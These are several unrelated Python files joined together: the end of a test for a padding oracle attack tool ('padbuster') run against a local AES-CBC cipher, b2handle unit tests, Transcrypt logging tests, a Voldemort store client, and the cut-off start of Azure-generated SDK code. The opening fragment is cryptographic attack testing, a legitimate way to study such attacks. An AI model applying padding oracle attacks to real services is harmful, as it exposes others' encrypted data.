print "\nRecovered in %d attempts\n" % (padbuster.attempts, )
assert decrypted == data, \
'Decrypted data %r does not match original %r' % (
decrypted, data)
print "Testing padding oracle exploit in ENCRYPT mode"
cipher2 = AES.new(key, AES.MODE_CBC, str(iv))
encrypted = padbuster.encrypt(teststring, block_size=AES.block_size)
decrypted = cipher2.decrypt(str(encrypted))[AES.block_size:]
decrypted = decrypted.rstrip(decrypted[-1])
print "Key: %r" % (key, )
print "IV: %r" % (iv, )
print "Plaintext: %r" % (teststring, )
print "Ciphertext: %r" % (str(encrypted), )
print "Decrypted: %r" % (str(decrypted), )
print "\nRecovered in %d attempts" % (padbuster.attempts, )
assert decrypted == teststring, \
'Encrypted data %r does not decrypt to %r, got %r' % (
encrypted, teststring, decrypted)
if __name__ == '__main__':
test()
|
|
"""Testing methods that normally need Handle server read access,
by providing a handle record to replace read access."""
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import json
import b2handle
from b2handle.handleclient import EUDATHandleClient
from b2handle.utilhandle import check_handle_syntax
from past.builtins import long
# Load some data that is needed for testing
PATH_RES = b2handle.util.get_neighbour_directory(__file__, 'resources')
RECORD = json.load(open(PATH_RES+'/handlerecord_for_reading_PUBLIC.json'))
RECORD_WITH = json.load(open(PATH_RES+'/handlerecord_with_10320LOC_PUBLIC.json'))
RECORD_WITHOUT = json.load(open(PATH_RES+'/handlerecord_without_10320LOC_PUBLIC.json'))
RECORD_WITH_EMPTY = json.load(open(PATH_RES+'/handlerecord_with_empty_10320LOC_PUBLIC.json'))
class EUDATHandleClientReadaccessFakedTestCase(unittest.TestCase):
'''Testing methods for retrieving values and indices.'''
def setUp(self):
self.inst = EUDATHandleClient()
def tearDown(self):
pass
# get_value_from_handle
def test_get_value_from_handle_normal(self):
"""Test retrieving a specific value from a handle record."""
handlerecord = RECORD
handle = RECORD['handle']
val = self.inst.get_value_from_handle(handle,
'TEST1',
handlerecord)
self.assertEquals(val, 'val1',
'The value of "TEST1" should be "val1".')
def test_get_value_from_handle_inexistentvalue(self):
"""Test retrieving an inexistent value from a handle record."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'TEST100',
handlerecord)
self.assertIsNone(val,
'The value of "TEST100" should be None.')
def test_get_value_from_handle_HS_ADMIN(self):
"""Test retrieving an HS_ADMIN value from a handle record."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'HS_ADMIN',
handlerecord)
self.assertIn('handle', val,
'The HS_ADMIN has no entry "handle".')
self.assertIn('index', val,
'The HS_ADMIN has no entry "index".')
self.assertIn('permissions', val,
'The HS_ADMIN has no entry "permissions".')
syntax_ok = check_handle_syntax(val['handle'])
self.assertTrue(syntax_ok,
'The handle in HS_ADMIN is not well-formatted.')
self.assertIsInstance(val['index'], (int, long),
'The index of the HS_ADMIN is not an integer.')
self.assertEqual(str(val['permissions']).replace('0','').replace('1',''), '',
'The permission value in the HS_ADMIN contains not just 0 and 1.')
def test_get_value_from_handle_duplicatekey(self):
"""Test retrieving a value of a duplicate key."""
handlerecord = RECORD
handle = handlerecord['handle']
val = self.inst.get_value_from_handle(handle,
'TESTDUP',
handlerecord)
self.assertIn(val, ("dup1", "dup2"),
'The value of the duplicate key "TESTDUP" should be "dup1" or "dup2".')
# retrieve_handle_record
def test_retrieve_handle_record_normal(self):
handlerecord = RECORD
handle = handlerecord['handle']
dict_record = self.inst.retrieve_handle_record(handle, handlerecord)
self.assertIn('TEST1', dict_record,
'Key "test1" not in handlerecord dictionary!')
self.assertIn('TEST2', dict_record,
'Key "test2" not in handlerecord dictionary!')
self.assertIn('TESTDUP', dict_record,
'Key "testdup" not in handlerecord dictionary!')
self.assertIn('HS_ADMIN', dict_record,
'Key "HS_ADMIN" not in handlerecord dictionary!')
self.assertEqual(dict_record['TEST1'], 'val1',
'The value of "TEST1" is not "val1.')
self.assertEqual(dict_record['TEST2'], 'val2',
'The value of "TEST2" is not "val2.')
self.assertIn(dict_record['TESTDUP'], ("dup1", "dup2"),
'The value of the duplicate key "TESTDUP" should be "dup1" or "dup2".')
self.assertIn('permissions', dict_record['HS_ADMIN'],
'The HS_ADMIN has no permissions: '+dict_record['HS_ADMIN'])
self.assertEqual(len(dict_record), 4,
                         'The record should have a length of 4 (as the duplicate is ignored).')
# get_handlerecord_indices_for_key
def test_get_indices_for_key_normal(self):
"""Test getting the indices for a specific key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('TEST1', handlerecord['values'])
self.assertEqual(len(indices),1,
'There is more or less than 1 index!')
self.assertEqual(indices[0], 3,
'The index of "test1" is not 3.')
def test_get_indices_for_key_duplicatekey(self):
"""Test getting the indices for a duplicate key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('TESTDUP', handlerecord['values'])
self.assertEqual(len(indices),2,
'There is more or less than 2 indices!')
self.assertIn(5, indices,
'5 is not in indices for key "testdup".')
self.assertIn(6, indices,
'6 is not in indices for key "testdup".')
def test_get_indices_for_key_inexistentkey(self):
"""Test getting the indices for an inexistent key."""
handlerecord = RECORD
handle = handlerecord['handle']
indices = self.inst.get_handlerecord_indices_for_key('test100', handlerecord['values'])
self.assertEqual(len(indices),0,
'There is more than 0 index!')
self.assertEqual(indices,[],
'Indices should be an empty list!')
# is_10320LOC_empty
def test_is_10320LOC_empty_notempty(self):
"""Test if presence of 10320/LOC is detected."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertFalse(answer,
'The record contains a 10320/LOC, but the is_empty does not return False.')
def test_is_10320LOC_empty_no10320LOC(self):
"""Test if absence of 10320/LOC is detected."""
handlerecord = RECORD_WITHOUT
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertTrue(answer,
'The record contains no 10320/LOC, but the is_empty does not return True.')
def test_is_10320LOC_empty_empty10320LOC(self):
"""Test if emptiness of 10320/LOC is detected."""
handlerecord = RECORD_WITH_EMPTY
handle = handlerecord['handle']
answer = self.inst.is_10320LOC_empty(handle, handlerecord)
self.assertTrue(answer,
'The record contains an empty 10320/LOC, but the is_empty does not return True.')
    # is_URL_contained_in_10320LOC
def test_is_URL_contained_in_10320LOC_true(self):
"""Test if presence of URL is found in 10320/LOC."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://foo.bar',
handlerecord)
val = self.inst.get_value_from_handle(handle, '10320/LOC', handlerecord)
self.assertTrue(answer,
'The URL exists in the 10320/LOC, and still the method does not return True:\n'+str(val))
def test_is_URL_contained_in_10320LOC_false(self):
"""Test if absence of URL is detected in existing 10320/LOC."""
handlerecord = RECORD_WITH
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://bar.bar',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC does not contain the URL, and still the method does not return False.')
def test_is_URL_contained_in_inexistent_10320LOC(self):
"""Test if absence of URL is detected if 10320/LOC does not exist."""
handlerecord = RECORD_WITHOUT
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://whatever.foo',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC does not exist, and still the method does not return False.')
def test_is_URL_contained_in_empty_10320LOC(self):
"""Test if absence of URL is detected if 10320/LOC is empty."""
handlerecord = RECORD_WITH_EMPTY
handle = handlerecord['handle']
answer = self.inst.is_URL_contained_in_10320LOC(handle,
'http://whatever.foo',
handlerecord)
self.assertFalse(answer,
'The 10320/LOC is empty, and still the method does not return False.')
|
|
from org.transcrypt.stubs.browser import __pragma__, __envir__
import logging
from utils import TestHandler, resetLogging
def logger_basics(test):
resetLogging()
logger = logging.getLogger("tester")
test.check(logger.name)
test.check(logger.level)
test.check(logger.hasHandlers())
# level set methods
test.check(logger.getEffectiveLevel())
logger.setLevel(10)
test.check(logger.level)
testLevel = "USERDEFLEVEL"
test.check(test.expectException(lambda : logger.setLevel(testLevel)))
test.check(logging.getLevelName(testLevel))
for i in range(0,50,5):
test.check(logging.getLevelName(i))
logging.addLevelName(35, testLevel)
test.check(logging.getLevelName(testLevel))
for i in range(0,50,5):
test.check(logging.getLevelName(i))
for i in range(0,50,5):
test.check(logger.isEnabledFor(i))
hdlr = TestHandler(test, 30)
fmt = logging.Formatter(style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
test.check(logger.hasHandlers())
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
logger.setLevel(0)
    # @note - Transcrypt only has the '.format()' method for
    # string formatting, but Python's logging module has a
    # fixed mode using the old-style % formatting concept.
    # This is obviously non-optimal from a testing perspective
    # as well as from an interop perspective...
if __envir__.executor_name == __envir__.transpiler_name:
logger.debug("This is a debug msg {}", 1)
else:
logger.debug("This is a debug msg %d", 1)
if __envir__.executor_name == __envir__.transpiler_name:
logger.info("This is an info message: {}", "blarg")
else:
logger.info("This is an info message: %s", "blarg")
if __envir__.executor_name == __envir__.transpiler_name:
logger.warning("This is a {} warning message in the {}", "blue", "barn")
else:
logger.warning("This is a %s warning message in the %s", "blue", "barn")
if __envir__.executor_name == __envir__.transpiler_name:
logger.error("This is an error message: {} {} {}", 3, "23", 4)
else:
logger.error("This is an error message: %d %s %d", 3, "23", 4)
logger.critical("The house is on fire")
# Test the handler level change
hdlr.setLevel(30)
logger.debug("This is a debug msg {}", 1)
logger.info("This is an info message: {}", "blarg")
if __envir__.executor_name == __envir__.transpiler_name:
logger.warning("This is a {} warning message in the {}", "blue", "barn")
else:
logger.warning("This is a %s warning message in the %s", "blue", "barn")
if __envir__.executor_name == __envir__.transpiler_name:
logger.error("This is an error message: {} {} {}", 3, "23", 4)
else:
logger.error("This is an error message: %d %s %d", 3, "23", 4)
logger.critical("The house is on fire")
def logging_api_tests(test):
resetLogging()
logger = logging.getLogger()
logger.setLevel(20)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter(style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
logger.setLevel(40)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(20)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(39)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(41)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
hdlr.setLevel(40)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
logger.setLevel(39)
logging.critical("Another Crazy Message!")
logging.error("Oh the humanity")
logging.warning("Is it hot in here?")
logging.info("Big Bird says Hello!")
logging.debug("No body gonna see this message")
def formatter_tests(test):
""" This function contains some tests of the formatter objects
"""
resetLogging()
logger = logging.getLogger("fmttest")
logger.setLevel(10)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter("{levelname}:{name}:{message}", style="{")
test.check(fmt.usesTime())
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
hdlr.setLevel(30)
test.check(hdlr.name)
hdlr.name = "Asdf"
test.check(hdlr.name)
test.check(hdlr.level)
test.check(logger.hasHandlers())
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
hdlr.setLevel(0)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
def console_test(test):
""" @note- this test will only generate minimal
autotester results but can be manually inspected in the
console.log
"""
resetLogging()
logger = logging.getLogger("consoleTest")
logger.setLevel(10)
hdlr = TestHandler(test, 30)
fmt = logging.Formatter("{name}:{message}", style="{")
test.check(fmt.usesTime())
hdlr.setFormatter(fmt)
hdlr.setLevel(20)
logger.addHandler(hdlr)
shdlr = logging.StreamHandler()
shdlr.setFormatter(fmt)
shdlr.setLevel(20)
logger.addHandler(shdlr)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
shdlr.setLevel(10)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
shdlr.setLevel(40)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("The house is on fire")
def placeholder_testing(test):
""" This test is intended to manage placeholding of loggers
For example creating "asdf.qwer.eer" when "asdf.qwer" does not
exit
"""
logger = logging.getLogger("phtest.middle.testme")
logger.setLevel(10)
hdlr = TestHandler(test, 5)
fmt = logging.Formatter("{levelname}:{name}:{message}", style="{")
hdlr.setFormatter(fmt)
logger.addHandler(hdlr)
logger.error("Gen a message")
log2 = logging.getLogger("phtest.middle")
log2.setLevel(10)
log2.addHandler(hdlr)
log2.info("This is another message")
log3 = logging.getLogger("phtest")
log3.setLevel(10)
log3.addHandler(hdlr)
log3.info("Yet another message")
# Now let's go the opposite way
logger = logging.getLogger("mngtest")
logger.setLevel(10)
logger.addHandler(hdlr)
logger.error("Gen a message 2 - the generating")
log2 = logging.getLogger("mngtest.mid")
log2.setLevel(10)
log2.addHandler(hdlr)
log2.info("This is another message 2 - the anothering")
log3 = logging.getLogger("mngtest.mid.end")
log3.setLevel(10)
log3.addHandler(hdlr)
log3.info("Yet another message 2 - the whatever...")
def run(test):
""" These are general logging test for the Logger class and
associated classes. This does not cover the configuration module.
"""
logger_basics(test)
logging_api_tests(test)
formatter_tests(test)
console_test(test)
placeholder_testing(test)
|
|
import socket
import struct
import time
import sys
import re
import random
import logging
import protocol.voldemort_client_pb2 as protocol
from xml.dom import minidom
from datetime import datetime
import serialization
##################################################################
# A Voldemort client. Each client uses a single connection to one
# Voldemort server. All routing is done server-side.
##################################################################
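## A minimal usage sketch (the bootstrap address and store name are illustrative;
## get() returns a list of (value, version) pairs, as documented below):
##   client = StoreClient('my_store', [('localhost', 6666)])
##   versions = client.get('some_key')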
## Extract all the child text of the given element
def _extract_text(elm):
if elm.nodeType == minidom.Node.TEXT_NODE:
return elm.data
elif elm.nodeType == minidom.Node.ELEMENT_NODE:
text = ""
for child in elm.childNodes:
text += _extract_text(child)
return text
## Get a single child from the element; if there are multiple children, explode.
def _child(elmt, name, required=True):
children = [child for child in elmt.childNodes
if child.nodeType == minidom.Node.ELEMENT_NODE and child.tagName == name]
if not children:
if required:
raise VoldemortException("No child '%s' for element '%s'." % (name, elmt.nodeName))
else:
return None
if len(children) > 1:
raise VoldemortException("Multiple children '%s' for element '%s'." % (name, elmt.nodeName))
return children[0]
## Get the child text of a single element
def _child_text(elmt, name, required=True, default=None):
if default:
required = False
child = _child(elmt, name, required=required)
if not child:
return default
return _extract_text(child)
def _int_or_none(s):
if s is None:
return s
return int(s)
##################################################################
# A node class representing a single voldemort server in the
# cluster. The cluster itself is just a list of nodes
##################################################################
class Node:
"""A Voldemort node with the appropriate host and port information for contacting that node"""
def __init__(self, id, host, socket_port, http_port, partitions, is_available = True, last_contact = None):
self.id = id
self.host = host
self.socket_port = socket_port
self.http_port = http_port
self.partitions = partitions
        self.is_available = is_available
        self.last_contact = last_contact or time.clock()
def __repr__(self):
return 'node(id = ' + str(self.id) + ', host = ' + self.host + ', socket_port = ' + str(self.socket_port) + \
', http_port = ' + str(self.http_port) + ', partitions = ' + ', '.join(map(str, self.partitions)) + ')'
@staticmethod
def parse_cluster(xml):
"""Parse the cluster.xml file and return a dictionary of the nodes in the cluster indexed by node id """
doc = minidom.parseString(xml)
nodes = {}
for curr in doc.getElementsByTagName('server'):
id = int(_child_text(curr, 'id'))
host = _child_text(curr, 'host')
http_port = int(_child_text(curr, 'http-port'))
socket_port = int(_child_text(curr, 'socket-port'))
partition_str = _child_text(curr, 'partitions')
partitions = [int(p) for p in re.split('[\s,]+', partition_str)]
nodes[id] = Node(id = id, host = host, socket_port = socket_port, http_port = http_port, partitions = partitions)
return nodes
class Store:
def __init__(self, store_node):
self.name = _child_text(store_node, "name")
self.persistence = _child_text(store_node, "persistence")
self.routing = _child_text(store_node, "routing")
self.routing_strategy = _child_text(store_node, "routing-strategy", default="consistent-routing")
self.replication_factor = int(_child_text(store_node, "replication-factor"))
self.required_reads = int(_child_text(store_node, "required-reads"))
self.preferred_reads = _int_or_none(_child_text(store_node, "preferred-reads", required=False))
self.required_writes = int(_child_text(store_node, "required-writes"))
self.preferred_writes = _int_or_none(_child_text(store_node, "preferred-writes", required=False))
key_serializer_node = _child(store_node, "key-serializer")
try:
self.key_serializer_type = _child_text(key_serializer_node, "type")
self.key_serializer = self._create_serializer(self.key_serializer_type, key_serializer_node)
except serialization.SerializationException, e:
logging.warn("Error while creating key serializer for store [%s]: %s" % (self.name, e))
self.key_serializer_type = "invalid"
self.key_serializer = serialization.UnimplementedSerializer("invalid")
value_serializer_node = _child(store_node, "value-serializer")
try:
self.value_serializer_type = _child_text(value_serializer_node, "type")
self.value_serializer = self._create_serializer(self.value_serializer_type, value_serializer_node)
except serialization.SerializationException, e:
logging.warn("Error while creating value serializer for store [%s]: %s" % (self.name, e))
self.value_serializer_type = "invalid"
self.value_serializer = serialization.UnimplementedSerializer("invalid")
def _create_serializer(self, serializer_type, serializer_node):
if serializer_type not in serialization.SERIALIZER_CLASSES:
return serialization.UnimplementedSerializer(serializer_type)
return serialization.SERIALIZER_CLASSES[serializer_type].create_from_xml(serializer_node)
@staticmethod
def parse_stores_xml(xml, store_name):
doc = minidom.parseString(xml)
store_nodes = doc.getElementsByTagName("store")
for store_node in store_nodes:
name = _child_text(store_node, "name")
if name == store_name:
return Store(store_node)
return None
class VoldemortException(Exception):
def __init__(self, msg, code = 1):
self.code = code
self.msg = msg
def __str__(self):
return repr(self.msg)
class StoreClient:
"""A simple Voldemort client. It is single-threaded and supports only server-side routing."""
def __init__(self, store_name, bootstrap_urls, reconnect_interval = 500, conflict_resolver = None):
self.store_name = store_name
self.request_count = 0
self.conflict_resolver = conflict_resolver
self.nodes, self.store = self._bootstrap_metadata(bootstrap_urls, store_name)
if not self.store:
raise VoldemortException("Cannot find store [%s] at %s" % (store_name, bootstrap_urls))
self.node_id = random.randint(0, len(self.nodes) - 1)
self.connection = None
self.node_id, self.connection = self._reconnect()
self.reconnect_interval = reconnect_interval
self.open = True
self.key_serializer = self.store.key_serializer
self.value_serializer = self.store.value_serializer
def _make_connection(self, host, port):
protocol = 'pb0'
logging.debug('Attempting to connect to ' + host + ':' + str(port))
connection = socket.socket()
connection.connect((host, port))
logging.debug('Connection succeeded, negotiating protocol')
connection.send(protocol)
resp = connection.recv(2)
if resp != 'ok':
raise VoldemortException('Server does not understand the protocol ' + protocol)
        logging.debug('Protocol negotiation succeeded')
return connection
    ## Connect to the next available node in the cluster
## returns a tuple of (node_id, connection)
def _reconnect(self):
num_nodes = len(self.nodes)
attempts = 0
new_node_id = self.node_id
self._close_socket(self.connection)
while attempts < num_nodes:
new_node_id = (new_node_id + 1) % num_nodes
new_node = self.nodes[new_node_id]
connection = None
try:
connection = self._make_connection(new_node.host, new_node.socket_port)
self.request_count = 0
return new_node_id, connection
except socket.error, (err_num, message):
logging.warn('Error connecting to node ' + str(new_node_id) + ': ' + message)
attempts += 1
# If we get here all nodes have failed us, explode
raise VoldemortException('Connections to all nodes failed.')
## Safely close the socket, catching and logging any exceptions
def _close_socket(self, socket):
try:
if socket:
socket.close()
except socket.error, exp:
logging.error('Error while closing socket: ' + str(exp))
    ## Check if the number of requests made on this connection is greater than the reconnect interval.
## If so reconnect to a random node in the cluster. No attempt is made at preventing the reconnecting
## from going back to the same node
def _maybe_reconnect(self):
if self.request_count >= self.reconnect_interval:
logging.debug('Completed ' + str(self.request_count) + ' requests using this connection, reconnecting...')
self.node_id, self.connection = self._reconnect()
## send a request to the server using the given connection
def _send_request(self, connection, req_bytes):
connection.send(struct.pack('>i', len(req_bytes)) + req_bytes)
self.request_count += 1
## read a response from the connection
def _receive_response(self, connection):
size_bytes = connection.recv(4)
if not size_bytes:
raise VoldemortException('Connection closed')
size = struct.unpack('>i', size_bytes)[0]
bytes_read = 0
data = []
while size and bytes_read < size:
chunk = connection.recv(size - bytes_read)
bytes_read += len(chunk)
data.append(chunk)
return ''.join(data)
## Bootstrap cluster metadata from a list of urls of nodes in the cluster.
## The urls are tuples in the form (host, port).
## A dictionary of node_id => node is returned.
def _bootstrap_metadata(self, bootstrap_urls, store_name):
random.shuffle(bootstrap_urls)
for host, port in bootstrap_urls:
logging.debug('Attempting to bootstrap metadata from ' + host + ':' + str(port))
connection = None
try:
connection = self._make_connection(host, port)
cluster_xmls = self._get_with_connection(connection, 'metadata', 'cluster.xml', should_route = False)
if len(cluster_xmls) != 1:
raise VoldemortException('Expected exactly one version of the metadata but found ' + str(cluster_xmls))
nodes = Node.parse_cluster(cluster_xmls[0][0])
logging.debug('Bootstrap from ' + host + ':' + str(port) + ' succeeded, found ' + str(len(nodes)) + " nodes.")
stores_xml = self._get_with_connection(connection, 'metadata', 'stores.xml', should_route=False)[0][0]
store = Store.parse_stores_xml(stores_xml, store_name)
return nodes, store
except socket.error, (err_num, message):
logging.warn('Metadata bootstrap from ' + host + ':' + str(port) + " failed: " + message)
finally:
self._close_socket(connection)
raise VoldemortException('All bootstrap attempts failed')
## check if the server response has an error, if so throw an exception
def _check_error(self, resp):
if resp.error and resp.error.error_code != 0:
raise VoldemortException(resp.error.error_message, resp.error.error_code)
## Increment the version for a vector clock
def _increment(self, clock):
new_clock = protocol.VectorClock()
new_clock.MergeFrom(clock)
        # See if we already have an entry for this node; if so, increment it
for entry in new_clock.entries:
if entry.node_id == self.node_id:
entry.version += 1
return new_clock
# Otherwise add a version
entry = new_clock.entries.add()
entry.node_id = self.node_id
entry.version = 1
new_clock.timestamp = int(time.time() * 1000)
return new_clock
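    # Worked example (assuming this client is connected as node 1): incrementing a clock with
    # entries [(node_id=0, version=2)] appends (node_id=1, version=1) and refreshes the
    # timestamp; incrementing it again on node 1 just bumps that entry to version 2.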
## Take a list of versions, and, if a conflict resolver has been given, resolve any conflicts that can be resolved
def _resolve_conflicts(self, versions):
if self.conflict_resolver and versions:
return self.conflict_resolver(versions)
else:
return versions
## Turn a protocol buffer list of versioned items into a python list of items
def _extract_versions(self, pb_versioneds):
versions = []
for versioned in pb_versioneds:
versions.append((versioned.value, versioned.version))
return self._resolve_conflicts(versions)
    ## A basic request wrapper that handles reconnection logic and failures
def _execute_request(self, fun, args):
assert self.open, 'Store has been closed.'
self._maybe_reconnect()
failures = 0
num_nodes = len(self.nodes)
while failures < num_nodes:
try:
return apply(fun, args)
except socket.error, (err_num, message):
logging.warn('Error while performing ' + fun.__name__ + ' on node ' + str(self.node_id) + ': ' + message)
self.node_id, self.connection = self._reconnect()
failures += 1
raise VoldemortException('All nodes are down, ' + fun.__name__ + ' failed.')
    ## An internal get function that takes the connection and store name as parameters. This is
    ## used by both the public get() method and the metadata bootstrap process
def _get_with_connection(self, connection, store_name, key, should_route):
"""Execute get request to the given store. Returns a (value, version) pair."""
req = protocol.VoldemortRequest()
req.should_route = should_route
req.store = store_name
req.type = protocol.GET
req.get.key = key
# send request
self._send_request(connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(connection)
resp = protocol.GetResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return self._extract_versions(resp.versioned)
## Inner helper function for get
def _get(self, key):
return self._get_with_connection(self.connection, self.store_name, key, True)
def get(self, key):
"""Execute a get request. Returns a list of (value, version) pairs."""
raw_key = self.key_serializer.writes(key)
return [(self.value_serializer.reads(value), version)
for value, version in self._execute_request(self._get, [raw_key])]
    ## Inner helper for get_all; uses this store's connection and store name
def _get_all(self, keys):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.GET_ALL
for key in keys:
req.getAll.keys.append(key)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.GetAllResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
values = {}
for key_val in resp.values:
values[key_val.key] = self._extract_versions(key_val.versions)
return values
def get_all(self, keys):
"""Execute get request for multiple keys given as a list or tuple.
Returns a dictionary of key => [(value, version), ...] pairs."""
raw_keys = [self.key_serializer.writes(key) for key in keys]
return dict((self.key_serializer.reads(key), [(self.value_serializer.reads(value), version)
for value, version in versioned_values])
for key, versioned_values in self._execute_request(self._get_all, [raw_keys]).iteritems())
## Get the current version of the given key by doing a get request to the store
def _fetch_version(self, key):
versioned = self.get(key)
if versioned:
version = versioned[0][1]
else:
version = protocol.VectorClock()
version.timestamp = int(time.time() * 1000)
return version
def _put(self, key, value, version):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.PUT
req.put.key = key
req.put.versioned.value = value
req.put.versioned.version.MergeFrom(version)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.PutResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return self._increment(version)
def put(self, key, value, version = None):
"""Execute a put request using the given key and value. If no version is specified a get(key) request
will be done to get the current version. The updated version is returned."""
raw_key = self.key_serializer.writes(key)
raw_value = self.value_serializer.writes(value)
# if we don't have a version, fetch one
if not version:
version = self._fetch_version(key)
return self._execute_request(self._put, [raw_key, raw_value, version])
def maybe_put(self, key, value, version = None):
"""Execute a put request using the given key and value. If the version being put is obsolete,
no modification will be made and this function will return None. Otherwise it will return the new version."""
try:
return self.put(key, value, version)
except:
return None
def _delete(self, key, version):
req = protocol.VoldemortRequest()
req.should_route = True
req.store = self.store_name
req.type = protocol.DELETE
req.delete.key = key
req.delete.version.MergeFrom(version)
# send request
self._send_request(self.connection, req.SerializeToString())
# read and parse response
resp_str = self._receive_response(self.connection)
resp = protocol.DeleteResponse()
resp.ParseFromString(resp_str)
self._check_error(resp)
return resp.success
def delete(self, key, version = None):
"""Execute a delete request, deleting all keys up to and including the given version.
If no version is given a get(key) request will be done to find the latest version."""
raw_key = self.key_serializer.writes(key)
# if we don't have a version, fetch one
        if version is None:
version = self._fetch_version(key)
return self._execute_request(self._delete, [raw_key, version])
def close(self):
"""Close the connection this store maintains."""
self.open = False
self.connection.close()
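# Illustrative usage sketch (hypothetical: the enclosing client class name and constructor are
# not shown in this excerpt, so StoreClient('my_store', [('localhost', 6666)]) below is an
# assumption, not confirmed by this file):
#
#     client = StoreClient('my_store', [('localhost', 6666)])
#     version = client.put('some_key', 'some_value')        # returns the incremented vector clock
#     values = client.get('some_key')                       # [(value, version), ...]
#     everything = client.get_all(['some_key', 'other_key'])
#     client.delete('some_key')                             # deletes versions up to the latest
#     client.close()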
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubRouteTableV2SOperations(object):
"""VirtualHubRouteTableV2SOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualHubRouteTableV2"
"""Retrieves the details of a VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHubRouteTableV2.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualHubRouteTableV2, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
error_map = {
